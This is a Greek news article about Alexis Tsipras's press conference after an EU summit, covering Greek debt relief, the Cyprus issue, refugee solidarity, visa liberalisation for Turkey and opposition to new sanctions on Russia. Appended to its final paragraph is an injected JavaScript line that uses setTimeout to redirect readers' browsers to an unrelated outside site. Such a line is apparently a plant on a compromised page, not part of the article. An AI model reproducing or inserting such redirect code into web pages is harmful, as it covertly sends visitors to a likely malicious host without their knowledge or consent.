Τσίπρας: Η Ελλάδα έχει αφήσει οριστικά πίσω της τις μέρες της κρίσης

0
11

 

Σε συνέντευξη Τύπου μετά την ολοκλήρωση των εργασιών της Συνόδου Κορυφής της ΕΕ ο Έλληνας πρωθυπουργός Αλέξης Τσίπρας τόνισε πως η χώρα έχει αφήσει οριστικά πίσω της τις μέρες της κρίσης και πως «οι συνομιλητές μου πιστεύω πως κατανόησαν αυτήν την ανάγκη. Κανείς δεν επιθυμεί νέες αναταράξεις, ενόψει μάλιστα μίας εκλογικής χρονιάς, για κρίσιμες ευρωπαϊκές χώρες«.

Ο πρωθυπουργός ανέφερε πως «σχεδόν σε όλους τους συνομιλητές μου -γιατί η συνάντησή μου με την πρωθυπουργό της Μ. Βρετανίας αφορούσε το Brexit και το Κυπριακό- έθεσα την ανάγκη να τηρηθούν τα συμφωνηθέντα από όλες τις πλευρές».

Έκανε αναφορά και στις αποφάσεις του Eurogroup του Μαΐου για το χρέος, λέγοντας πως «ήταν εξαιρετικά θετικές, και σε απολύτως θετικό πλαίσιο…». «Τα αρνητικά του Μαΐου δεν ήταν οι αποφάσεις, αλλά μετά, στις συνεντεύξεις Τύπου, όταν είδαμε την αντιπαράθεση ΔΝΤ και ευρωπαϊκών θεσμών» και φάνηκε αισιόδοξος ότι στο Eurogroup του Δεκεμβρίου θα έχουμε θετικές εξελίξεις: «Πρέπει να δοθεί ισχυρό σήμα στην επενδυτική κοινότητα και αυτό δεν δίνεται όσο υπάρχει διαρκής αναβολή σε όσα έχουμε συμφωνήσει. Πρέπει η Ελλάδα, το συντομότερο δυνατόν, να ενταχθεί στο Πρόγραμμα Ποσοτικής Χαλάρωσης» είπε και συμπλήρωσε: «Στη Σύνοδο Κορυφής του Δεκεμβρίου θα συζητηθεί η συγκεκριμενοποίηση των άμεσων και βραχυπρόσθεσμων μέτρων που ειναι απαραίτητα για την επίλυση του χρέους«.

Όσον αφορά στη συνάντηση με την καγκελάριο Άνγκελα Μέρκελ, είπε πως της έθεσε τα καίρια στρατηγικά ζητήματα και πρόσθεσε ότι η συνάντηση έγινε σε καλό κλίμα.

Επισήμανε, επίσης ότι υπάρχει θετικό κλίμα για την επίλυση του Κυπριακού, το οποίο και αποτέλεσε αντικείμενο συζήτησης στις συναντήσεις που είχε νωρίτερα με τον Γάλλο Πρόεδρο Φρανσουά Ολάντ και την Γερμανίδα καγκελάριο. Όπως τόνισε, οι δύο ηγέτες έδειξαν κατανόηση για το Κυπριακό και συμφώνησαν με τη θέση της Ελλάδας ότι δεν μπορεί να υπάρξει βιώσιμη λύση χωρίς να χαρακτηριστεί παράνομη η παρουσίας των κατοχικών τουρκικών δυνάμεων στην Κύπρο.

Ο πρωθυπουργός Αλέξης Τσίπρας δήλωσε επίσης πως σε ό,τι αφορά το προσφυγικό έγιναν σαφείς οι εσωτερικές αντιθέσεις στην ΕΕ. Πρόκειται για αντιθέσεις μεταξύ των χωρών που παραμένουν πιστές στην αρχή της αλληλεγγύης και εκείνες που επιθυμούν αλληλεγγύη α λα καρτ, είπε επισημαίνοντας ταυτόχρονα πως αυτό δεν μπορεί να γίνει αποδεκτό από την Ελλάδα που σηκώνει δυσανάλογο προς τις δυνάμεις της βάρος.

Ο Α. Τσίπρας ανέφερε επίσης ότι προς το παρόν η αλληλεγγύη προς την Ελλάδα είναι ανεπαρκής. Τόνισε ωστόσο πως οι σημερινές αποφάσεις της Συνόδου Κορυφής επί του θέματος αντανακλούν σε μεγάλο βαθμό τις ελληνικές θέσεις, οι οποίες δεν είναι συμβατές προς την ιδέα της λεγόμενης ευέλικτης αλληλεγγύης. Ο πρωθυπουργός τάχθηκε επίσης υπέρ της διαδικασίας φιλελευθεροποίησης των διαδικασιών παροχής βίζας στους Τούρκους πολίτες τονίζοντας ταυτόχρονα ότι θα πρέπει να αντιληφθεί η Τουρκία πως θέμα εξαίρεσης της Κύπρου δεν μπορεί να τεθεί.

Επιπλέον, εξέφρασε τη «σαφή θέση» της ελληνικής κυβέρνησης κατά των περαιτέρω κυρώσεων σε βάρος της Ρωσίας, παρά την ευθύνη που φέρει στην κλιμάκωση της βίας στο Χαλέπι. Ο κ. Τσίπρας εξήγησε πως είναι απαραίτητος ένας «θετικός διπλωματικός ρόλος» της ΕΕ υπέρ της «ειρήνης» και της «σταθερότητας» στην περιοχή. «Έστω και αυτή η εύθραυστη κατάπαυση πυρός είναι θετική», σημείωσε, προσθέτοντας, όμως, πως οι λύσεις πρέπει «να επουλώνουν τις πληγές και όχι να τις πολλαπλασιάζουν».

Καταδικάζοντας τις επιθέσεις εναντίον των αμάχων στο Χαλέπι και αλλού, ανέφερε πως η ΕΕ πρέπει να ασκήσει σημαντική πίεση σε όλες τις δυνάμεις που εμπλέκονται στους βομβαρδισμούς, υπογραμμίζοντας, ωστόσο, ότι δεν πρόκειται να βοηθήσει σε τίποτα ο εγκλωβισμός της Ευρώπης σε έναν κύκλο αλλεπάλληλων κυρώσεων και ψυχροπολεμικής ρητορικής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here